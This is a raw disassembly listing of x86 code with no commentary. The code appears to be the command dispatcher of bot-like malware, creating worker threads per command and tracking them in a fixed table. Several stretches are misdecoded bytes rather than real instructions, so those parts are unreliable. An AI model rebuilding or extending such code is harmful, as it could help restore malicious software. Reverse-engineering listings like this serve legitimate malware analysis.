push 3Fh
lea eax, [ebp-384h]
push esi
push eax
call sub_411D00
add esp, 0Ch
loc_40C478: ; CODE XREF: seg000:0040C464�j
lea eax, [ebp-3C4h]
mov dword ptr [ebp-2F0h], 1
push eax
lea eax, [ebp-444h]
push dword ptr [ebp-2F4h]
push eax
lea eax, [ebp-2E4h]
push offset dword_42B574
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 17h
push eax
call sub_40FFB7
add esp, 20h
mov [ebp-2ECh], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-448h]
push ebx
push eax
push offset sub_4090B0
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-2ECh]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40C504
loc_40C4EE: ; CODE XREF: seg000:0040C502�j
cmp [ebp-2E8h], ebx
jnz loc_40D0B5
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40C4EE
; ---------------------------------------------------------------------------
loc_40C504: ; CODE XREF: seg000:0040C4EC�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B528
jmp loc_40CF25
; ---------------------------------------------------------------------------
loc_40C515: ; CODE XREF: seg000:0040AFAD�j
; seg000:0040AFC4�j
push dword ptr [ebp+20h]
call sub_410A7F
cmp eax, ebx
pop ecx
mov [ebp-578h], eax
jle loc_40C606
mov esi, 80h
push edi
lea eax, [ebp-700h]
push esi
push eax
call sub_410A8A
xor eax, eax
cmp [ebp-9A2h], bl
push dword ptr [ebp-98h]
setnz al
mov [ebp-574h], eax
mov eax, [ebp+0Ch]
mov [ebp-704h], eax
lea eax, [ebp-600h]
push esi
push eax
call sub_410A8A
mov eax, [ebp-4]
push dword ptr [ebp+20h]
mov [ebp-570h], eax
mov eax, [ebp-8]
mov [ebp-56Ch], eax
push edi
push offset dword_42B4E8
lea eax, [ebp-2E4h]
push 200h
push eax
call sub_410A8A
push ebx
lea eax, [ebp-2E4h]
push 0Dh
push eax
call sub_40FFB7
add esp, 38h
mov [ebp-580h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-704h]
push ebx
push eax
push offset loc_401447
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-580h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40C5F5
loc_40C5DF: ; CODE XREF: seg000:0040C5F3�j
cmp [ebp-568h], ebx
jnz loc_40B441
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40C5DF
; ---------------------------------------------------------------------------
loc_40C5F5: ; CODE XREF: seg000:0040C5DD�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B49C
jmp loc_40B432
; ---------------------------------------------------------------------------
loc_40C606: ; CODE XREF: seg000:0040C526�j
push offset dword_42B450
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40C610: ; CODE XREF: seg000:0040AF7F�j
; seg000:0040AF96�j
push dword ptr [ebp+20h]
push edi
call near ptr 3D0000h
icebp
test eax, eax
jz short loc_40C63D
push dword ptr [ebp+20h]
lea eax, [ebp-2E4h]
push edi
push offset dword_42B418
push 200h
push eax
call sub_410A8A
add esp, 14h
jmp short loc_40C65C
; ---------------------------------------------------------------------------
loc_40C63D: ; CODE XREF: seg000:0040C61C�j
push offset dword_42B3F8
call loc_406ECC
push eax
lea eax, [ebp-2E4h]
push 200h
push eax
call sub_410A8A
add esp, 10h
loc_40C65C: ; CODE XREF: seg000:0040C63B�j
; seg000:0040D0FF�j ...
cmp [ebp-8], ebx
jnz short loc_40C67D
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40C67D: ; CODE XREF: seg000:0040A371�j
; seg000:0040C65F�j ...
push 1
pop esi
loc_40C680: ; CODE XREF: seg000:0040C8DA�j
; seg000:0040CFFA�j ...
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
pop ecx
mov eax, esi
jmp loc_40980E
; ---------------------------------------------------------------------------
loc_40C694: ; CODE XREF: seg000:0040AF51�j
; seg000:0040AF68�j
push 44h
lea eax, [ebp-4A8h]
pop esi
push esi
push ebx
push eax
call sub_410590
push 1
mov [ebp-4A8h], esi
pop esi
mov [ebp-478h], bx
push edi
mov [ebp-47Ch], esi
call sub_410A7F
add esp, 10h
cmp eax, esi
jnz short loc_40C6D1
mov word ptr [ebp-478h], 5
loc_40C6D1: ; CODE XREF: seg000:0040C6C6�j
cmp [ebp-0Ch], ebx
jz loc_40D0B5
push dword ptr [ebp+20h]
push dword ptr [ebp-0Ch]
call sub_410AE0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_40D0B5
lea eax, [ebp-0D8h]
push eax
lea eax, [ebp-4A8h]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call near ptr 3D0000h
pop edi
test eax, eax
jnz short loc_40C71C
push offset dword_42B3C0
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40C71C: ; CODE XREF: seg000:0040C710�j
push edi
push offset dword_42B394
jmp loc_40CF25
; ---------------------------------------------------------------------------
loc_40C727: ; CODE XREF: seg000:0040AF23�j
; seg000:0040AF3A�j
push dword ptr [ebp+20h]
push offset dword_423018
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40C8A3
lea eax, [ebp-3E8h]
push eax
push 104h
call near ptr 3D0000h
test eax, 0FF68h
add [ebp-7877Bh], cl
call dword ptr [edi+50h]
call sub_411D00
lea eax, [ebp-0E4h]
push eax
call sub_40F741
push eax
lea eax, [ebp-3E8h]
push eax
lea eax, [ebp-688h]
push offset dword_42B388
push eax
call sub_41050B
mov eax, [ebp+esi-94h]
add esp, 20h
cmp eax, ebx
mov dword ptr [ebp-584h], 1
mov [ebp-580h], ebx
jz short loc_40C7B9
push 10h
push ebx
push eax
call sub_4118C9
add esp, 0Ch
mov [ebp-578h], eax
jmp short loc_40C7BF
; ---------------------------------------------------------------------------
loc_40C7B9: ; CODE XREF: seg000:0040C7A3�j
mov [ebp-578h], ebx
loc_40C7BF: ; CODE XREF: seg000:0040C7B7�j
mov esi, [ebp+esi-90h]
cmp esi, ebx
jz short loc_40C7D9
push esi
call sub_410A7F
pop ecx
mov [ebp-57Ch], eax
jmp short loc_40C7DF
; ---------------------------------------------------------------------------
loc_40C7D9: ; CODE XREF: seg000:0040C7C8�j
mov [ebp-57Ch], ebx
loc_40C7DF: ; CODE XREF: seg000:0040C7D7�j
movzx eax, byte ptr [ebp-9AFh]
mov esi, [ebp+0Ch]
push 7Fh
push dword ptr [ebp-98h]
mov [ebp-574h], eax
lea eax, [ebp-808h]
mov [ebp-80Ch], esi
push eax
call sub_411D00
mov eax, [ebp-4]
push edi
mov [ebp-56Ch], eax
mov eax, [ebp-8]
mov [ebp-570h], eax
lea eax, [ebp-2E4h]
push offset dword_42B348
push eax
call sub_41050B
push esi
lea eax, [ebp-2E4h]
push 16h
push eax
call sub_40FFB7
add esp, 24h
mov [ebp-588h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-80Ch]
push ebx
push eax
push offset loc_408152
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-588h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40C886
loc_40C874: ; CODE XREF: seg000:0040C884�j
cmp [ebp-568h], ebx
jnz short loc_40C8B6
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40C874
; ---------------------------------------------------------------------------
loc_40C886: ; CODE XREF: seg000:0040C872�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B2F8
loc_40C892: ; CODE XREF: seg000:0040D03E�j
; seg000:0040D048�j ...
lea eax, [ebp-2E4h]
push eax
call sub_41050B
loc_40C89E: ; CODE XREF: seg000:0040D9FB�j
add esp, 0Ch
jmp short loc_40C8B6
; ---------------------------------------------------------------------------
loc_40C8A3: ; CODE XREF: seg000:0040C738�j
lea eax, [ebp-2E4h]
push offset dword_42B2A0
push eax
call sub_41050B
pop ecx
pop ecx
loc_40C8B6: ; CODE XREF: seg000:0040C87A�j
; seg000:0040C8A1�j
cmp [ebp-8], ebx
jnz short loc_40C8D7
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40C8D7: ; CODE XREF: seg000:0040C8B9�j
; seg000:0040DF18�j ...
mov esi, [ebp+2Ch]
jmp loc_40C680
; ---------------------------------------------------------------------------
loc_40C8DF: ; CODE XREF: seg000:0040AEF5�j
; seg000:0040AF0C�j
push dword ptr [ebp-9Ch]
push offset dword_42CA90
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40980B
cmp [ebp-0Ch], ebx
jz loc_40980B
push dword ptr [ebp+20h]
push dword ptr [ebp-0Ch]
call sub_410AE0
push eax
lea eax, [ebp-2E4h]
push dword ptr [ebp-98h]
push dword ptr [ebp-9Ch]
push dword ptr [ebp-0A0h]
push offset dword_42B290
push eax
call sub_41050B
lea eax, [ebp-2E4h]
push 1FFh
push eax
push dword ptr [ebp+8]
call sub_411D00
push edi
call sub_410A7F
add esp, 30h
test eax, eax
jle short loc_40C966
push edi
call sub_410A7F
imul eax, 3E8h
pop ecx
push eax
call ds:dword_41C058 ; Sleep
loc_40C966: ; CODE XREF: seg000:0040C950�j
push offset dword_42B268
call sub_407E0E
mov eax, [ebp+2Ch]
pop ecx
inc eax
jmp loc_40980E
; ---------------------------------------------------------------------------
loc_40C97A: ; CODE XREF: seg000:0040AEC7�j
; seg000:0040AEDE�j
push dword ptr [ebp-9Ch]
push offset dword_42CA90
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40980B
cmp [ebp-0Ch], ebx
jz loc_40E148
push dword ptr [ebp+20h]
push dword ptr [ebp-0Ch]
call sub_410AE0
mov esi, eax
mov eax, [ebp+20h]
inc eax
push offset dword_42B260
push eax
call sub_410930
add esp, 10h
test eax, eax
push esi
jz short loc_40CA36
push dword ptr [ebp-98h]
lea eax, [ebp-2E4h]
push dword ptr [ebp-9Ch]
push dword ptr [ebp-0A0h]
push offset dword_42B290
push eax
call sub_41050B
lea eax, [ebp-2E4h]
push 1FFh
push eax
push dword ptr [ebp+8]
call sub_411D00
push esi
lea eax, [ebp-2E4h]
push offset dword_42B234
push eax
call sub_41050B
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
push edi
call sub_410A7F
add esp, 38h
test eax, eax
jle loc_40E148
push edi
call sub_410A7F
add eax, [ebp+2Ch]
pop ecx
jmp loc_40980E
; ---------------------------------------------------------------------------
loc_40CA36: ; CODE XREF: seg000:0040C9BF�j
push offset dword_42B1EC
jmp loc_40CF25
; ---------------------------------------------------------------------------
loc_40CA40: ; CODE XREF: seg000:0040AE99�j
; seg000:0040AEB0�j
push dword ptr [ebp+20h]
lea eax, [ebp-2E4h]
push offset dword_42B1E4
push eax
call sub_41050B
push edi
call sub_410A7F
add esp, 10h
loc_40CA5D: ; CODE XREF: seg000:0040CAC4�j
test eax, eax
jle loc_40E148
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40E148
loc_40CA77: ; CODE XREF: seg000:0040D186�j
lea eax, [ebp-2E4h]
push eax
push offset dword_41EE48
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call sub_40E321
jmp loc_40DFF7
; ---------------------------------------------------------------------------
loc_40CAA0: ; CODE XREF: seg000:0040AE6B�j
; seg000:0040AE82�j
push dword ptr [ebp+esi-94h]
lea eax, [ebp-2E4h]
push dword ptr [ebp+20h]
push offset dword_42B1D8
push eax
call sub_41050B
push edi
call sub_410A7F
add esp, 14h
jmp short loc_40CA5D
; ---------------------------------------------------------------------------
loc_40CAC6: ; CODE XREF: seg000:0040AE3D�j
; seg000:0040AE54�j
push dword ptr [ebp+20h]
lea eax, [ebp-2E4h]
push offset dword_42B1D0
push eax
call sub_41050B
push edi
call sub_410A7F
add esp, 10h
test eax, eax
jle loc_40E148
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40E148
lea eax, [ebp-2E4h]
push eax
push offset dword_41EE48
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call sub_40E321
push dword ptr [ebp+20h]
push edi
push offset dword_42B1A0
loc_40CB2A: ; CODE XREF: seg000:0040CBB1�j
; seg000:0040CC1C�j ...
call sub_407E82
jmp loc_40DCB8
; ---------------------------------------------------------------------------
loc_40CB34: ; CODE XREF: seg000:0040AE0F�j
; seg000:0040AE26�j
cmp [ebp-0Ch], ebx
jz loc_40E148
push dword ptr [ebp+20h]
push dword ptr [ebp-0Ch]
call sub_410AE0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40CB65
push esi
lea eax, [ebp-2E4h]
push offset dword_42B198
push eax
call sub_41050B
add esp, 0Ch
loc_40CB65: ; CODE XREF: seg000:0040CB4E�j
push edi
call sub_410A7F
test eax, eax
pop ecx
jle loc_40E148
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40E148
lea eax, [ebp-2E4h]
push eax
push offset dword_41EE48
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call sub_40E321
push esi
push edi
push offset dword_42B168
jmp loc_40CB2A
; ---------------------------------------------------------------------------
loc_40CBB6: ; CODE XREF: seg000:0040ADE1�j
; seg000:0040ADF8�j
cmp [ebp-0Ch], ebx
jz loc_40E148
push dword ptr [ebp+20h]
push dword ptr [ebp-0Ch]
call sub_410AE0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40E148
push edi
call sub_410A7F
test eax, eax
pop ecx
jle loc_40E148
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40E148
push esi
push offset dword_41EE48
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call sub_40E321
push esi
push edi
push offset dword_42B138
jmp loc_40CB2A
; ---------------------------------------------------------------------------
loc_40CC21: ; CODE XREF: seg000:0040ADB3�j
; seg000:0040ADCA�j
cmp [ebp-0Ch], ebx
jz loc_40E148
push edi
push dword ptr [ebp-0Ch]
call sub_410AE0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40E148
push esi
push offset dword_42B12C
push dword ptr [ebp+0Ch]
call sub_40E321
push esi
push offset dword_42B0FC
jmp loc_40D377
; ---------------------------------------------------------------------------
loc_40CC58: ; CODE XREF: seg000:0040AD85�j
; seg000:0040AD9C�j
push dword ptr [ebp-9Ch]
push offset dword_42CA90
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40980B
push dword ptr [ebp+20h]
push offset dword_42B0F0
push dword ptr [ebp+0Ch]
call sub_40E321
push edi
call sub_410A7F
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_41C058 ; Sleep
push dword ptr [ebp+esi-94h]
push dword ptr [ebp+20h]
push offset dword_42CB88
push dword ptr [ebp+0Ch]
call sub_40E321
push offset dword_42B0C8
call sub_407E0E
jmp loc_40D37C
; ---------------------------------------------------------------------------
loc_40CCBE: ; CODE XREF: seg000:0040AD57�j
; seg000:0040AD6E�j
cmp [ebp-0Ch], ebx
jz loc_40E148
push edi
call sub_410B60
push dword ptr [ebp+18h]
mov esi, eax
call sub_410B60
add eax, [ebp-0Ch]
push dword ptr [ebp+20h]
lea eax, [eax+esi+2]
push eax
call sub_410AE0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_40E148
push esi
lea eax, [ebp-2E4h]
push offset dword_42B8CC
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push ebx
push eax
push edi
push dword ptr [ebp+0Ch]
call sub_40E367
push esi
push edi
push offset dword_42B098
call sub_407E82
add esp, 2Ch
jmp loc_40E148
; ---------------------------------------------------------------------------
loc_40CD2C: ; CODE XREF: seg000:0040AD29�j
; seg000:0040AD40�j
cmp [ebp-0Ch], ebx
jz loc_40E148
push edi
call sub_410B60
push dword ptr [ebp+18h]
mov esi, eax
call sub_410B60
add eax, [ebp-0Ch]
push dword ptr [ebp+20h]
lea eax, [eax+esi+2]
push eax
call sub_410AE0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_40E148
push ebx
push ebx
push esi
push edi
push dword ptr [ebp+0Ch]
call sub_40E367
push esi
push edi
push offset dword_42B068
call sub_407E82
loc_40CD7A: ; CODE XREF: seg000:0040BA03�j
add esp, 20h
jmp loc_40E148
; ---------------------------------------------------------------------------
loc_40CD82: ; CODE XREF: seg000:0040ACFB�j
; seg000:0040AD12�j
cmp [ebp-0Ch], ebx
jz loc_40980B
push dword ptr [ebp+20h]
push dword ptr [ebp-0Ch]
call sub_410AE0
pop ecx
cmp eax, ebx
pop ecx
jz loc_40980B
push eax
push edi
call sub_407D16
push edi
lea eax, [ebp-2E4h]
push offset dword_42B038
push eax
call sub_41050B
add esp, 14h
jmp loc_40B441
; ---------------------------------------------------------------------------
loc_40CDC1: ; CODE XREF: seg000:0040ACBB�j
; seg000:0040ACD2�j
push edi
push dword ptr [ebp+24h]
call sub_410AE0
pop ecx
test eax, eax
pop ecx
jz loc_40E148
mov esi, [ebp+esi-98h]
cmp esi, ebx
jz short loc_40CE5E
push esi
push dword ptr [ebp-0Ch]
call sub_410AE0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40CE46
push esi
lea eax, [ebp-2E4h]
push dword ptr [ebp-98h]
push dword ptr [ebp-9Ch]
push dword ptr [ebp-0A0h]
push offset dword_42B290
push eax
call sub_41050B
lea eax, [ebp-2E4h]
push 1FFh
push eax
push dword ptr [ebp+8]
call sub_411D00
push esi
push edi
lea eax, [ebp-2E4h]
push offset dword_42B000
push eax
call sub_41050B
add esp, 34h
inc dword ptr [ebp+2Ch]
jmp loc_40DED4
; ---------------------------------------------------------------------------
loc_40CE46: ; CODE XREF: seg000:0040CDEE�j
lea eax, [ebp-2E4h]
push offset dword_42AFBC
push eax
call sub_41050B
pop ecx
pop ecx
jmp loc_40DED4
; ---------------------------------------------------------------------------
loc_40CE5E: ; CODE XREF: seg000:0040CDDD�j
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+24h]
push eax
call sub_407C50
add esp, 0Ch
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
push edi
push offset dword_42AF90
lea eax, [ebp-2E4h]
push 200h
push eax
call sub_410A8A
add esp, 24h
jmp loc_40DED4
; ---------------------------------------------------------------------------
loc_40CEA5: ; CODE XREF: seg000:0040A9F1�j
; seg000:0040AA08�j
push offset dword_42AF8C
push edi
call sub_411B4E
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40CF1F
mov ebx, 200h
push esi
lea eax, [ebp-2E4h]
push ebx
push eax
call sub_41269C
add esp, 0Ch
loc_40CECE: ; CODE XREF: seg000:0040CEFD�j
test eax, eax
jz short loc_40CEFF
push 1
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
push esi
lea eax, [ebp-2E4h]
push ebx
push eax
call sub_41269C
add esp, 20h
jmp short loc_40CECE
; ---------------------------------------------------------------------------
loc_40CEFF: ; CODE XREF: seg000:0040CED0�j
push esi
call sub_4119F0
push edi
lea eax, [ebp-2E4h]
push offset dword_42AF54
push eax
call sub_41050B
add esp, 10h
jmp loc_40DED4 ; CODE XREF: seg000:0040CF95�j
; ---------------------------------------------------------------------------
loc_40CF1F: ; CODE XREF: seg000:0040CEB6�j
push edi
push offset dword_42AF20
loc_40CF25: ; CODE XREF: seg000:0040B3C5�j
; seg000:0040C510�j ...
lea eax, [ebp-2E4h]
push eax
call sub_41050B
add esp, 0Ch
jmp loc_40D0B5
; ---------------------------------------------------------------------------
loc_40CF39: ; CODE XREF: seg000:0040A9C3�j
; seg000:0040A9DA�j
cmp [ebp-0Ch], ebx
jz loc_40E148
push edi
push dword ptr [ebp-0Ch]
call sub_410AE0
pop ecx
cmp eax, ebx
pop ecx
jz loc_40E148
push eax
call sub_406F91
test eax, eax
pop ecx
jnz short loc_40CF6A
push offset dword_42AEF0
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40CF6A: ; CODE XREF: seg000:0040CF5E�j
push offset dword_42AEC0
jmp loc_40D0A7
; ---------------------------------------------------------------------------
loc_40CF74: ; CODE XREF: seg000:0040A995�j
; seg000:0040A9AC�j
push ebx
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
push edi
call sub_404134
push edi
push offset dword_42AE98
jmp loc_40CB2A
; ---------------------------------------------------------------------------
loc_40CF8F: ; CODE XREF: seg000:0040A967�j
; seg000:0040A97E�j
push edi
call near ptr 3D0000h
jb short near ptr loc_40CF1A+2
sal byte ptr [eax+ecx+57h], 68h
push 0EB0042AEh
or ebp, [eax-8]
mov bl, 42h
add al, ch
and [edi-72AF0001h], bl
test ds:68FFFFh[edi*8], ebx
add al, [eax]
add [eax-18h], dl
int 3 ; Trap to Debugger
cmp al, [eax]
add [ebx-0F16EF3Ch], al
clc
; ---------------------------------------------------------------------------
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_40CFC6: ; CODE XREF: seg000:0040A939�j
; seg000:0040A950�j
push edi
call sub_410A7F
push eax
call sub_40F67C
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_40CFE3
push offset dword_42AE30
jmp short loc_40CFE8
; ---------------------------------------------------------------------------
loc_40CFE3: ; CODE XREF: seg000:0040CFDA�j
push offset dword_42ADE8
loc_40CFE8: ; CODE XREF: seg000:0040CFE1�j
lea eax, [ebp-2E4h]
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-8], ebx
jnz loc_40C680
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
jmp loc_40C680
; ---------------------------------------------------------------------------
loc_40D021: ; CODE XREF: seg000:0040A90B�j
; seg000:0040A922�j
push ebx
push ebx
push edi
push dword ptr [ebp-4]
push ebx
push dword ptr [ebp+0Ch]
call loc_40F3ED
add esp, 18h
cmp eax, 1
push edi
jnz short loc_40D043
push offset dword_42ADB0
jmp loc_40C892
; ---------------------------------------------------------------------------
loc_40D043: ; CODE XREF: seg000:0040D037�j
push offset dword_42AD6C
jmp loc_40C892
; ---------------------------------------------------------------------------
loc_40D04D: ; CODE XREF: seg000:0040A8DD�j
; seg000:0040A8F4�j
push edi
call ds:dword_4307D0
cmp eax, 0FFFFFFFFh
mov [ebp+8], eax
jz short loc_40D087
push 2
lea eax, [ebp+8]
push 4
push eax
call ds:dword_430750
cmp eax, ebx
jz short loc_40D0A2
push dword ptr [eax]
loc_40D070: ; CODE XREF: seg000:0040D0A0�j
push edi
lea eax, [ebp-2E4h]
push offset dword_42AD3C
push eax
call sub_41050B
add esp, 10h
jmp short loc_40D0B5
; ---------------------------------------------------------------------------
loc_40D087: ; CODE XREF: seg000:0040D05A�j
push edi
call ds:dword_430814
cmp eax, ebx
jz short loc_40D0A2
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_43081C
push eax
jmp short loc_40D070
; ---------------------------------------------------------------------------
loc_40D0A2: ; CODE XREF: seg000:0040D06C�j
; seg000:0040D090�j
push offset dword_42AD00
loc_40D0A7: ; CODE XREF: seg000:0040AA3A�j
; seg000:0040AABE�j ...
lea eax, [ebp-2E4h]
push eax
call sub_41050B
pop ecx
pop ecx
loc_40D0B5: ; CODE XREF: seg000:0040AA42�j
; seg000:0040AA9C�j ...
cmp [ebp-8], ebx
jnz loc_40DED4
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
jmp loc_40DED4
; ---------------------------------------------------------------------------
loc_40D0DF: ; CODE XREF: seg000:0040A8AF�j
; seg000:0040A8C6�j
push 7Fh
push edi
push dword ptr [ebp+1Ch]
call sub_411D00
push edi
lea eax, [ebp-2E4h]
push offset dword_42ACC8
push eax
call sub_41050B
add esp, 18h
jmp loc_40C65C
; ---------------------------------------------------------------------------
loc_40D104: ; CODE XREF: seg000:0040A881�j
; seg000:0040A898�j
push 5
push ebx
push ebx
push edi
push offset dword_422D68
push ebx
call ds:dword_430714
test eax, eax
push edi
jz short loc_40D124
push offset dword_42AC98
jmp loc_40C892
; ---------------------------------------------------------------------------
loc_40D124: ; CODE XREF: seg000:0040D118�j
push offset dword_42AC60
jmp loc_40C892
; ---------------------------------------------------------------------------
loc_40D12E: ; CODE XREF: seg000:0040A853�j
; seg000:0040A86A�j
mov al, [edi]
mov ds:byte_42300C, al
movsx eax, byte ptr [edi]
push eax
push offset dword_42AC28
jmp loc_40E0C5
; ---------------------------------------------------------------------------
loc_40D143: ; CODE XREF: seg000:0040A825�j
; seg000:0040A83C�j
push edi
call sub_410A7F
test eax, eax
pop ecx
jle loc_40E148
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40E148
push ebx
push ebx
lea eax, [ebp-20h]
push 2
push eax
call sub_40FA4E
push eax
lea eax, [ebp-2E4h]
push offset dword_42B1D0
push eax
call sub_41050B
add esp, 1Ch
jmp loc_40CA77
; ---------------------------------------------------------------------------
loc_40D18B: ; CODE XREF: seg000:0040A7F7�j
; seg000:0040A80E�j
push edi
call sub_410A7F
test eax, eax
pop ecx
jle loc_40980B
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40980B
push offset dword_42AC18
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call sub_40E321
pop ecx
pop ecx
push 1F4h
call ds:dword_41C058 ; Sleep
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call ds:dword_430828
push dword ptr [ebp-10h]
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358EC[eax]
call near ptr 3D0000h
in al, 57h
call sub_410A7F
imul eax, 234h
push edi
mov ds:dword_4358EC[eax], ebx
call sub_410A7F
imul eax, 234h
pop ecx
pop ecx
mov byte ptr ds:dword_4356D8[eax], bl
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40D236: ; CODE XREF: seg000:0040A7C9�j
; seg000:0040A7E0�j
push edi
push offset dword_42AC14
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40D265
call sub_410180
cmp eax, ebx
jle short loc_40D25B
push eax
push offset dword_42ABD8
jmp loc_40B432
; ---------------------------------------------------------------------------
loc_40D25B: ; CODE XREF: seg000:0040D24E�j
push offset dword_42AB9C
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40D265: ; CODE XREF: seg000:0040D245�j
mov eax, [ebp-0ACh]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_40980B
lea eax, [ebp+edi*4-0A0h]
mov [ebp+2Ch], eax
loc_40D281: ; CODE XREF: seg000:0040D2F2�j
mov eax, [ebp+2Ch]
mov esi, [eax]
cmp esi, ebx
jz loc_40980B
push esi
call sub_410A7F
push eax
call sub_4100F2
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_40D2A8
push offset dword_42AB64
jmp short loc_40D2AD
; ---------------------------------------------------------------------------
loc_40D2A8: ; CODE XREF: seg000:0040D29F�j
push offset dword_42AB24
loc_40D2AD: ; CODE XREF: seg000:0040D2A6�j
lea eax, [ebp-2E4h]
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-8], ebx
jnz short loc_40D2DD
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40D2DD: ; CODE XREF: seg000:0040D2BF�j
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
add dword ptr [ebp+2Ch], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_40D281
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40D2F9: ; CODE XREF: seg000:0040A79B�j
; seg000:0040A7B2�j
cmp [ebp-0Ch], ebx
jz loc_40E148
push edi
push dword ptr [ebp-0Ch]
call sub_410AE0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40E148
push esi
push offset dword_41EE48
push dword ptr [ebp+0Ch]
call sub_40E321
push esi
push offset dword_42AAF8
jmp short loc_40D377
; ---------------------------------------------------------------------------
loc_40D32D: ; CODE XREF: seg000:0040A76D�j
; seg000:0040A784�j
push edi
push offset dword_42B0F0
push dword ptr [ebp+0Ch]
call sub_40E321
push edi
push offset dword_42AAC4
jmp short loc_40D377
; ---------------------------------------------------------------------------
loc_40D343: ; CODE XREF: seg000:0040A73F�j
; seg000:0040A756�j
push dword ptr [ebp+esi-98h]
push edi
push offset dword_42CB88
push dword ptr [ebp+0Ch]
call sub_40E321
push edi
push offset dword_42AA90
jmp loc_40CB2A
; ---------------------------------------------------------------------------
loc_40D363: ; CODE XREF: seg000:0040A711�j
; seg000:0040A728�j
push edi
push offset dword_42CB74
push dword ptr [ebp+0Ch]
call sub_40E321
push edi
push offset dword_42AA58
loc_40D377: ; CODE XREF: seg000:0040CC53�j
; seg000:0040D32B�j ...
call sub_407E82
loc_40D37C: ; CODE XREF: seg000:0040CCB9�j
add esp, 14h
jmp loc_40E148
; ---------------------------------------------------------------------------
